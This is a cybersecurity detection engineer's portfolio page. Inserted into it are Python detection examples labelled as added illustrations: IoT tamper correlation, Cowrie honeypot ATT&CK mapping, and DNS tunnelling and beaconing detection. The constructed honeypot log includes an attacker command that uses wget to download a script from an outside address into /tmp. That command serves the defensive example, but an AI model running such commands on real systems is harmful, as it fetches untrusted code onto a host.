Open to opportunities · London, UK

Amanpreet Singh Matharu

Cyber Security Infrastructure & Detection Engineer

SOC operations, detection engineering, incident response, and secure infrastructure design. Building controls that work reliably in real operational environments — from log ingestion to MITRE ATT&CK-aligned detections.

5+ Years in Tech · 20+ KQL Detections · 4 SOC Projects · MITRE ATT&CK Aligned · 3 Languages
English (Full Professional) · Hindi (Professional) · Punjabi (Native)

// 00 — profile

About Me

I am a Cyber Security Infrastructure and Detection Engineer with hands-on experience across SOC operations, detection engineering, incident response, and secure infrastructure design. My background combines strong infrastructure fundamentals with advanced defensive security, allowing me to build controls that work reliably in real operational environments.

I design and operate SIEM-based detections using Microsoft Sentinel (KQL) and Splunk (SPL), working closely with SOC teams to investigate incidents, tune alerts, reduce false positives, and improve detection quality — all aligned to MITRE ATT&CK, covering identity abuse, MFA fatigue, PowerShell misuse, ransomware indicators, and lateral movement.

From an infrastructure perspective I bring practical knowledge of TCP/IP, DNS, DHCP, VLANs, firewalls, VPNs, and traffic analysis using Wireshark. I have designed DNS security monitoring pipelines including DNSSEC-enabled recursive resolution, secure log forwarding, and SIEM-based detection of malicious domains.

My early career included NOC and data centre operations, network rack builds, device configuration, and enterprise server migration support — giving me the infrastructure depth that most detection engineers lack. I am seeking a role where I can contribute immediately to security operations while continuing to grow as a detection-focused security engineer.

🧠
Detection Engineering
Identity abuse, MFA fatigue, PowerShell misuse, ransomware indicators, lateral movement — all MITRE ATT&CK mapped
🏗️
Infrastructure Security
Active Directory, BitLocker via GPO, DNS security pipelines, DNSSEC, firewall & VPN design
🔬
Hands-On Lab Builder
Honeypots, IoT-to-SIEM pipelines, DNS monitoring platforms — built from scratch, not tutorials
🎓
Educator & Mentor
Advanced cybersecurity teaching at UWL — SIEM, incident response, CTF labs, AD attack simulations
🌐
Right to Work — UK
Skilled Worker Visa active. Open to on-site, hybrid, and remote roles across England

// 01 — expertise

Technical Skills

🛡️
SIEM & Detection
Microsoft Sentinel · Splunk Enterprise · KQL (Advanced) · SPL · Log Analytics
🎯
Threat Hunting & Detection Eng.
MITRE ATT&CK · Threat Hunting · Sysmon · IOC Analysis · False Positive Reduction
☁️
Endpoint & Cloud Security
Defender XDR · Azure AD / Entra ID · Defender for Identity · MFA · BitLocker via GPO
🌐
Networking & Infrastructure
TCP/IP · Wireshark · DNS / DHCP · VLANs · Firewalls · VPNs (CCNA) · DNSSEC
⚙️
Development & IoT
Python (Automation) · Bash · JSON Parsing · Raspberry Pi · IoT Sensors · Linux
🏢
Identity & Active Directory
AD Design · GPO Enforcement · Naming Standards · Access Control · Windows Event Logs
🔧
Systems Administration
Atera RMM · Microsoft 365 · Exchange Online · Huntress EDR · Odoo ERP
📋
SOC & Incident Response
BEC Analysis · Ransomware Detection · IR Playbooks · Alert Triage · NIST / SANS

// 02 — portfolio

Key Projects

🔍
Microsoft Sentinel Threat Hunting Portfolio
Sentinel · KQL · Sysmon · MITRE ATT&CK
  • Built a Threat Hunting Workbook with 20+ custom KQL queries detecting PowerShell abuse, C2 traffic & lateral movement.
  • Analysed BEC attack paths — detections for MFA fatigue, inbox rules & token replay.
  • Developed ransomware early-detection workflows focusing on behavioural patterns & file system anomalies.
  • Engineered credential theft detections for LSASS dumping & Kerberoasting (Event Logs 4624/4625).
KQL · Sentinel · MITRE ATT&CK · Sysmon · Threat Hunting
🤖
Cyber-Physical SOC: IoT to Splunk Pipeline
Splunk · SPL · Python · Raspberry Pi · DHT11 / PIR / MPU6050
  • Designed end-to-end telemetry pipeline: Sensors → Raspberry Pi → JSON logs → Splunk Universal Forwarder.
  • Integrated DHT11 (temp/humidity), PIR (motion), and MPU6050 (vibration/tamper) sensors.
  • Built SPL-based time-window correlation logic (Motion + Tamper within 120s) to reduce false positives.
  • Automated incident creation with severity scoring and SOC-style lifecycle tracking.
Splunk · Python · Raspberry Pi · IoT · SPL
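Added illustration, not the author's project code (which the page says lives in SPL): the motion-plus-tamper time-window correlation described above, implemented in Python over constructed sensor events in the JSON-lines shape the pipeline forwards to Splunk. The 120-second window is the page's; the field names (ts, sensor, event, zone, g), the 3.0 g severity threshold and the incident record layout are assumptions made for the example.

```python
"""Motion + tamper time-window correlation (added example, not the page's SPL).

Constructed sample telemetry in the shape the pipeline forwards
(sensor -> Raspberry Pi -> JSON line -> Splunk Universal Forwarder).
Field names, the 3.0 g threshold and the incident layout are assumptions."""
import json
from collections import defaultdict, deque
from datetime import datetime, timezone

WINDOW_SECONDS = 120   # page: "Motion + Tamper within 120s"
HIGH_G = 3.0           # assumed: acceleration at/above this means forceful handling

# Constructed events, not real sensor output.
SAMPLE_LOGS = """
{"ts": "2024-01-01T22:00:05Z", "sensor": "pir", "event": "motion", "zone": "server_room"}
{"ts": "2024-01-01T22:00:40Z", "sensor": "mpu6050", "event": "tamper", "zone": "server_room", "g": 2.7}
{"ts": "2024-01-01T22:10:00Z", "sensor": "pir", "event": "motion", "zone": "server_room"}
{"ts": "2024-01-01T22:15:00Z", "sensor": "mpu6050", "event": "tamper", "zone": "server_room", "g": 1.9}
{"ts": "2024-01-01T22:20:00Z", "sensor": "dht11", "event": "reading", "zone": "server_room", "temp_c": 31.5}
{"ts": "2024-01-01T22:20:30Z", "sensor": "mpu6050", "event": "tamper", "zone": "server_room", "g": 3.4}
{"ts": "2024-01-01T22:20:50Z", "sensor": "pir", "event": "motion", "zone": "server_room"}
"""


def load_events(raw):
    """Parse JSON lines and sort by timestamp (forwarder delivery is not strictly ordered)."""
    events = [json.loads(line) for line in raw.strip().splitlines() if line.strip()]
    for e in events:
        e["_t"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return sorted(events, key=lambda e: e["_t"])


def correlate(events, window=WINDOW_SECONDS):
    """Open one incident per zone when motion AND tamper both occur within `window` seconds.

    A lone tamper reading (someone bumping the rack) or lone motion (normal access)
    never fires; that is where the false-positive reduction comes from."""
    recent = defaultdict(deque)   # zone -> motion/tamper events still inside the window
    last_opened = {}              # zone -> time of last incident, to suppress re-firing
    incidents = []
    for e in events:
        if e.get("event") not in ("motion", "tamper"):
            continue              # environmental readings are not part of this rule
        zone = e.get("zone", "unknown")
        q = recent[zone]
        q.append(e)
        while (e["_t"] - q[0]["_t"]).total_seconds() > window:
            q.popleft()           # evict events older than the window
        if {"motion", "tamper"} <= {x["event"] for x in q}:
            last = last_opened.get(zone)
            if last is not None and (e["_t"] - last).total_seconds() <= window:
                continue          # already raised for this burst
            peak_g = max(x.get("g", 0.0) for x in q if x["event"] == "tamper")
            incidents.append({
                "id": f"INC-{len(incidents) + 1:04d}",
                "zone": zone,
                "first_event": q[0]["ts"],
                "trigger_event": e["ts"],
                "severity": "high" if peak_g >= HIGH_G else "medium",
                "status": "new",  # lifecycle: new -> triaged -> contained -> closed
                "evidence": [f'{x["ts"]} {x["sensor"]}:{x["event"]}' for x in q],
            })
            last_opened[zone] = e["_t"]
    return incidents


if __name__ == "__main__":
    print(json.dumps(correlate(load_events(SAMPLE_LOGS)), indent=2))
```

On the constructed sample this opens two incidents: the 22:00 motion-then-tamper pair (medium, 2.7 g) and the 22:20 tamper-then-motion pair (high, 3.4 g). The 22:10 motion and 22:15 tamper are 300 seconds apart and are correctly suppressed. Note that the rule fires regardless of which sensor triggers first, which matters for a real intruder who jolts the rack before the PIR catches them.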
🍯
Cowrie Honeypot & SIEM Detection Engineering
Splunk · Cowrie SSH · MITRE ATT&CK · IR Playbooks
  • Deployed Cowrie SSH honeypot on Raspberry Pi — capturing auth attempts, HASSH fingerprints, command execution & session lifecycle.
  • Forwarded structured JSON telemetry to Splunk via Universal Forwarder.
  • Built SOC detections for brute-force (T1110), credential compromise (T1078), and post-exploitation (T1059, T1105).
  • Created IR playbooks for high-severity events; honeypot kept off public internet per DMZ best practice.
Splunk · Honeypot · MITRE ATT&CK · IR Playbooks · Raspberry Pi
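Added illustration, not the author's Splunk detections: the four ATT&CK mappings listed above (T1110, T1078, T1059, T1105) applied in Python to constructed Cowrie-style JSON events. The event names and field names follow Cowrie's JSON log output; the sample lines, the five-failures-in-60-seconds threshold, the severity labels and the TEST-NET source addresses are assumptions made for the example.

```python
"""Cowrie SSH honeypot telemetry -> ATT&CK-mapped alerts (added example, not the
author's Splunk searches). Event names/fields follow Cowrie's JSON log format;
sample lines, thresholds, severities and source addresses are constructed."""
import json
from collections import defaultdict
from datetime import datetime, timezone

BRUTE_THRESHOLD = 5    # assumed: failed logins from one source within the window
BRUTE_WINDOW = 60      # seconds

# Constructed Cowrie JSON lines (TEST-NET addresses, fake session ids and hash).
SAMPLE_COWRIE = """
{"eventid": "cowrie.session.connect", "timestamp": "2024-01-01T22:00:00.000000Z", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "protocol": "ssh"}
{"eventid": "cowrie.login.failed", "timestamp": "2024-01-01T22:00:01.000000Z", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "username": "root", "password": "123456"}
{"eventid": "cowrie.login.failed", "timestamp": "2024-01-01T22:00:03.000000Z", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "username": "root", "password": "admin"}
{"eventid": "cowrie.login.failed", "timestamp": "2024-01-01T22:00:05.000000Z", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "username": "root", "password": "root"}
{"eventid": "cowrie.login.failed", "timestamp": "2024-01-01T22:00:08.000000Z", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "username": "root", "password": "toor"}
{"eventid": "cowrie.login.failed", "timestamp": "2024-01-01T22:00:12.000000Z", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "username": "root", "password": "qwerty"}
{"eventid": "cowrie.login.success", "timestamp": "2024-01-01T22:00:15.000000Z", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "username": "root", "password": "password"}
{"eventid": "cowrie.command.input", "timestamp": "2024-01-01T22:00:20.000000Z", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "input": "uname -a"}
{"eventid": "cowrie.command.input", "timestamp": "2024-01-01T22:00:25.000000Z", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "input": "wget http://198.51.100.9/x.sh -O /tmp/x.sh"}
{"eventid": "cowrie.session.file_download", "timestamp": "2024-01-01T22:00:26.000000Z", "src_ip": "203.0.113.7", "session": "a1b2c3d4e5f6", "url": "http://198.51.100.9/x.sh", "outfile": "dl/x.sh", "shasum": "deadbeef"}
{"eventid": "cowrie.login.failed", "timestamp": "2024-01-01T22:05:00.000000Z", "src_ip": "198.51.100.22", "session": "0f0f0f0f0f0f", "username": "admin", "password": "admin"}
{"eventid": "cowrie.login.failed", "timestamp": "2024-01-01T22:05:02.000000Z", "src_ip": "198.51.100.22", "session": "0f0f0f0f0f0f", "username": "admin", "password": "admin123"}
"""


def load_cowrie(raw):
    """Parse Cowrie JSON lines and sort by timestamp."""
    events = [json.loads(line) for line in raw.strip().splitlines() if line.strip()]
    for e in events:
        e["_t"] = datetime.strptime(e["timestamp"], "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)
    return sorted(events, key=lambda e: e["_t"])


def _alert(technique, severity, e, detail):
    return {"technique": technique, "severity": severity, "src_ip": e.get("src_ip"),
            "session": e.get("session"), "time": e["timestamp"], "detail": detail}


def detect(events, threshold=BRUTE_THRESHOLD, window=BRUTE_WINDOW):
    """Map honeypot events to ATT&CK techniques; returns alerts in event order."""
    failures = defaultdict(list)  # src_ip -> timestamps of failed logins inside the window
    bruted = set()                # sources already alerted for T1110 (one alert per burst)
    alerts = []
    for e in events:
        ip, t, kind = e.get("src_ip"), e["_t"], e.get("eventid")
        if kind == "cowrie.login.failed":
            fl = failures[ip]
            fl.append(t)
            fl[:] = [x for x in fl if (t - x).total_seconds() <= window]   # slide the window
            if len(fl) >= threshold and ip not in bruted:
                bruted.add(ip)
                alerts.append(_alert("T1110", "medium", e, f"{len(fl)} failed logins within {window}s"))
        elif kind == "cowrie.login.success":
            # Guessing followed by a success: use of a (now) valid account, T1078.
            if failures[ip]:
                alerts.append(_alert("T1078", "high", e,
                                     f"login as {e.get('username')} after {len(failures[ip])} failures"))
        elif kind == "cowrie.command.input":
            alerts.append(_alert("T1059", "high", e, e.get("input", "")))        # post-exploitation shell
        elif kind == "cowrie.session.file_download":
            alerts.append(_alert("T1105", "critical", e,                          # tool/malware transfer
                                 f"{e.get('url')} shasum={e.get('shasum')}"))
    return alerts


if __name__ == "__main__":
    for a in detect(load_cowrie(SAMPLE_COWRIE)):
        print(a["technique"], a["severity"], a["src_ip"], a["detail"])
```

The second source (198.51.100.22) stops at two failures and produces nothing, which is the behaviour you want against background scanner noise. Everything from 203.0.113.7 escalates in order: T1110 on the fifth failure, T1078 on the success, T1059 for each command, T1105 for the download. In a real deployment the T1110 threshold is the main tuning knob; on an internet-facing honeypot it would fire constantly, which is one reason the page keeps this one off the public internet.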
🌐
DNS Security Monitoring Platform
Pi-hole · Unbound · DNSSEC · Splunk · Tailscale
  • Built a SOC-grade DNS telemetry platform treating DNS as a primary security signal.
  • Pi-hole for filtering + Unbound for full recursive DNSSEC resolution; all activity forwarded to Splunk.
  • Secured transport over a private Tailscale mesh network; host hardened with firewall rules & access controls.
  • Enables detection of DNS tunnelling, beaconing, and malicious domain patterns. MITRE ATT&CK extension planned.
Splunk · DNSSEC · Pi-hole · Tailscale · Threat Hunting
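Added illustration, not the author's platform code: two of the detections the page names, DNS tunnelling and beaconing, implemented in Python over constructed Pi-hole (dnsmasq) query-log lines. The log line layout is dnsmasq's query format; the entropy/length/count thresholds, the naive registered-domain split, the sample clients and the domains are assumptions made for the example. In the design described above this logic would run as Splunk searches over the forwarded log.

```python
"""DNS tunnelling and beaconing detection over Pi-hole (dnsmasq) query logs.
Added example, not the author's code. Log lines are constructed; thresholds
and the two-label registered-domain heuristic are assumptions."""
import math
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed dnsmasq query lines: one tunnelling client (192.168.1.10) sending
# high-entropy 32-char labels under example.net, one beaconing client (192.168.1.20)
# resolving the same name every 60 s, and one ordinary client (192.168.1.30).
SAMPLE_LOG = """
Jan 10 22:00:00 dnsmasq[612]: query[A] beacon.example.org from 192.168.1.20
Jan 10 22:00:01 dnsmasq[612]: query[TXT] a7c03f9e1d5b28644e8b1a36d5f02c97.t.example.net from 192.168.1.10
Jan 10 22:00:02 dnsmasq[612]: query[TXT] 5d2e8a1f7c0b39466b9f1e3a2d7c0584.t.example.net from 192.168.1.10
Jan 10 22:00:03 dnsmasq[612]: query[TXT] c1f8e4a02d9b7536f0a3b2c7e1d95864.t.example.net from 192.168.1.10
Jan 10 22:00:04 dnsmasq[612]: query[TXT] 9b4d6c2e8f1a0375a5e7c9f13b2d6804.t.example.net from 192.168.1.10
Jan 10 22:00:05 dnsmasq[612]: query[TXT] 2e7a9f0c4b1d83653c8f0d1b2a9e5746.t.example.net from 192.168.1.10
Jan 10 22:00:06 dnsmasq[612]: query[TXT] f3a5d1e7b9c0246872e4a6c1f9b3d058.t.example.net from 192.168.1.10
Jan 10 22:00:09 dnsmasq[612]: query[A] www.example.com from 192.168.1.30
Jan 10 22:01:00 dnsmasq[612]: query[A] beacon.example.org from 192.168.1.20
Jan 10 22:01:31 dnsmasq[612]: query[A] mail.example.com from 192.168.1.30
Jan 10 22:02:00 dnsmasq[612]: query[A] beacon.example.org from 192.168.1.20
Jan 10 22:03:00 dnsmasq[612]: query[A] beacon.example.org from 192.168.1.20
Jan 10 22:03:45 dnsmasq[612]: query[A] www.example.com from 192.168.1.30
Jan 10 22:04:00 dnsmasq[612]: query[A] beacon.example.org from 192.168.1.20
Jan 10 22:05:00 dnsmasq[612]: query[A] beacon.example.org from 192.168.1.20
Jan 10 22:06:00 dnsmasq[612]: query[A] beacon.example.org from 192.168.1.20
"""

LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) dnsmasq\[\d+\]: query\[(\w+)\] (\S+) from (\S+)$")


def parse_log(raw):
    """Keep only client 'query' lines; 'reply', 'cached', 'forwarded' lines are answers, not requests."""
    queries = []
    for line in raw.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, qtype, name, client = m.groups()
        t = datetime.strptime(" ".join(ts.split()), "%b %d %H:%M:%S")  # syslog stamp has no year
        queries.append({"t": t, "qtype": qtype, "name": name.lower().rstrip("."), "client": client})
    return queries


def shannon_entropy(s):
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(name):
    # Naive: last two labels. Production code should use the public suffix list
    # so that example.co.uk is not split as "co.uk".
    parts = name.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else name


def detect_tunnelling(queries, min_unique=5, min_entropy=3.5, min_len=20):
    """Many distinct, long, high-entropy leftmost labels under one domain from one client."""
    buckets = defaultdict(set)   # (client, registered domain) -> set of leftmost labels
    for q in queries:
        parts = q["name"].split(".")
        if len(parts) < 3:
            continue             # no subdomain label to measure
        buckets[(q["client"], registered_domain(q["name"]))].add(parts[0])
    alerts = []
    for (client, domain), labels in buckets.items():
        if len(labels) < min_unique:
            continue
        avg_ent = statistics.mean(shannon_entropy(l) for l in labels)
        avg_len = statistics.mean(len(l) for l in labels)
        if avg_ent >= min_entropy and avg_len >= min_len:
            alerts.append({"type": "dns_tunnelling", "client": client, "domain": domain,
                           "unique_labels": len(labels), "avg_entropy": round(avg_ent, 2),
                           "avg_label_len": round(avg_len, 1)})
    return alerts


def detect_beaconing(queries, min_queries=6, max_cv=0.1):
    """Same client resolving the same name at near-constant intervals (low coefficient of variation)."""
    times = defaultdict(list)
    for q in queries:
        times[(q["client"], q["name"])].append(q["t"])
    alerts = []
    for (client, name), ts in times.items():
        if len(ts) < min_queries:
            continue
        ts.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            alerts.append({"type": "beaconing", "client": client, "domain": name,
                           "queries": len(ts), "interval_s": round(mean, 1), "cv": round(cv, 3)})
    return alerts


def run(raw=SAMPLE_LOG):
    q = parse_log(raw)
    return detect_tunnelling(q) + detect_beaconing(q)


if __name__ == "__main__":
    for a in run():
        print(a)
```

Two alerts come out of the sample: tunnelling for 192.168.1.10 under example.net (six unique labels, 4.0 bits average entropy, 32-character labels) and beaconing for 192.168.1.20 to beacon.example.org (seven queries, 60 s interval, zero variance). The ordinary client trips neither rule. Both rules need allowlisting before they are production-grade: CDN, antivirus and DNSBL lookups legitimately use long high-entropy labels, and NTP pools and update checkers poll on fixed timers, so the tuning work the page describes is exactly where the effort goes.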

// 03 — career

Professional Experience

System Administrator · Feb 2026 – Present
Guard IQ · Contract · Remote
  • Administer Microsoft 365 tenant services — Exchange Online, identity management, mailbox admin & security configurations.
  • Manage endpoint monitoring and remote management through Atera RMM including patch management & troubleshooting.
  • Support incident investigation and endpoint remediation based on Huntress EDR alerts and security telemetry.
  • Implement security best practices: MFA, access control, and system hardening across client environments.
  • Maintain Odoo ERP system and assist with alert triage & security investigations across managed environments.
Cyber Security Lecturer · Jan 2023 – Present
University of West London · Part-time · On-site
  • Delivered hands-on SIEM, incident response, and Active Directory attack labs aligned to real SOC workflows.
  • Guided students through malware behaviour labs, PowerShell investigations, identity attack simulations & SOC alert analysis.
  • Taught Windows Server, Active Directory, VLANs, routing, subnetting, VPNs, and cloud identity security.
  • Developed course materials covering threat hunting, MITRE ATT&CK, and security monitoring workflows.
Cyber Security Detection Engineering · Jan 2021 – Present
Independent / Self-Directed · Self-employed
  • Designed and implemented a cyber-physical SOC prototype with real-world sensor telemetry into Splunk SIEM.
  • Deployed and analysed Cowrie SSH honeypot — studying real adversary behaviour and authentication patterns.
  • Built DNS security monitoring platform with DNSSEC, Pi-hole, Unbound, and Splunk integration.
  • Focused on detection tuning, false-positive reduction, and operational SOC relevance throughout all projects.
Information Technology Analyst · Jun 2018 – Mar 2020
Nagarro · Full-time · Hybrid · India
  • Supported enterprise Windows/Linux, Active Directory, and network environments with focus on security controls.
  • Managed AD users, permissions & GPOs; performed security patching, AV management, and encryption enforcement.
  • Configured DNS, DHCP, VPN, and firewall rules supporting secure network operations.
  • Used Wireshark to diagnose network anomalies; supported internal audits and compliance controls.

// 04 — academic

Education

MSc Cyber Security
University of West London
Feb 2021 – Jul 2022
Merit
Fundamentals of Cybersecurity · Network & Systems Security · Applied Cryptography · Security & Assurance (GRC) · Big Data Analytics · Knowledge Management
Computer Systems Networking & Telecoms
Jetking
Jun 2017 – Jan 2018
Distinction
CCNA · MCSA · Active Directory · Server 2008/2012/2016 · Routing & Switching · BGP · VLANs · Network Security
BSc Information Technology
Guru Nanak Dev University
2014 – 2017

"Amanpreet never allowed challenges to break his focus. He was the one who stayed consistent, encouraged others, shared notes, explained concepts patiently, and supported anyone who was falling behind. What I admire most is how he handles pressure — calmly, logically, and with a maturity far beyond his age. Amanpreet is not just hardworking; he is reliable, humble, and genuinely supportive. Anyone who works with him will see the same qualities: resilience, integrity, and a mindset that refuses to give up."

MK
Manpreet Kaur
Assistant Manager at Amorino UK · Studied together at UWL

// 05 — connect

Get In Touch

Let's work together.

Open to SOC Analyst, Detection Engineer, and Security Infrastructure roles across England — on-site, hybrid, or remote. Skilled Worker Visa active, no sponsorship needed.

🎖️ Certifications & Status
In progress: CompTIA CySA+
Active: Skilled Worker Visa — Right to Work (UK)
Active: MSc Cyber Security — UWL (Merit)
Active: Networking — Jetking (Distinction)
Active: Huntress EDR — Operational Experience
Active: Atera RMM — Operational Experience